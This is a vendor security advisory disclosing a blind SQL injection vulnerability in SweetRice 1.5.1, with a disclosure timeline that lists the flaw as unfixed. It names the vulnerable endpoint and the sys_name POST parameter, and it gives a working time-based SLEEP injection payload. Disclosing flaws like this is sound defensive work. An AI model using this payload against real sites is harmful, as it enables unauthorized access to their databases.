Blind SQL Injection Vulnerability in SweetRice 1.5.1
Information
Advisory by Netsparker (now Invicti)
Name: Blind SQL Injection Vulnerability in SweetRice
Affected Software: SweetRice
Affected Versions: 1.5.1
Vendor Homepage: http://www.basic-cms.org/
Vulnerability Type: Blind SQL Injection
Severity: Critical
Status: Not Fixed
Invicti Advisory Reference: NS-17-005
Technical Details
Proof of Concept URL for Blind SQL Injection vulnerability in SweetRice;
URL: /SweetRice-1.5.1/as/?type=post&mode=insert
Parameter Name: sys_name
Parameter Type: POST
Attack Pattern: '+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
For more information on SQL Injection vulnerabilities read the article SQL Injection.
Advisory Timeline
24 Nov 2016 – Issue reported
Nov 2016 – Feb 2017 – Several attempts to get in touch
01 Feb 2017 – Advisory released
Solution
No solution is available.
Credits & Authors
This issue has been discovered by Emre Iyidogan while testing Invicti Web Application Security Scanner.
About Invicti
Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.